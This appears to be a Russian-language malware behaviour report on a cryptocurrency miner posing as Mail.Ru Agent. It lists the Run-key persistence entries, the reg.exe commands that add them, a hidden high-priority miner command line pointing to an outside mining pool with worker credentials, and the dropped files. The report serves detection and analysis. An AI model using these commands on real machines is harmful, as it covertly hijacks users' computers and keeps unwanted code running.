Техническая информация
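Записи автозапуска в реестре (ключи Run; имя значения, по-видимому, имитирует Mail.Ru Агент и написано с опечаткой, а данные указывают на пакетный файл в <SYSTEM32>):
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'MailRUAggent' = '<SYSTEM32>\start.bat'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MailRUAggent' = '<SYSTEM32>\start.bat'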
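Командные строки запускаемых процессов. Параметры -a scrypt и -o stratum+tcp:// в первой строке характерны для майнера криптовалюты, подключающегося к пулу; ключи /NOCONSOLE и /HIGH у hstart.exe задают запуск без окна консоли и с высоким приоритетом:
- '<SYSTEM32>\hstart.exe' /NOCONSOLE /HIGH "<SYSTEM32>\MailRUaggent.exe -a scrypt -t 4 -o stratum+tcp://aikapool.com:7938 -u vasyamainer.dasha -p 123sheka"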
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MailRUAggent" /t REG_SZ /d "<SYSTEM32>\start.bat" /f
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\start.bat" "
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\auto.bat" "
- '<SYSTEM32>\reg.exe' Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MailRUAggent" /t REG_SZ /d "<SYSTEM32>\start.bat" /f
Файлы в <SYSTEM32>, относящиеся к образцу (исполняемые файлы, пакетные файлы и библиотеки):
- <SYSTEM32>\MailRUaggent.exe
- <SYSTEM32>\libwinpthread-1.dll
- <SYSTEM32>\start.bat
- <SYSTEM32>\pthreadGC2.dll
- <SYSTEM32>\auto.bat
- <SYSTEM32>\zlib1.dll
- <SYSTEM32>\libcurl-4.dll
- <SYSTEM32>\hstart.exe
Окна, указанные в отчёте (класс и заголовок окна):
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''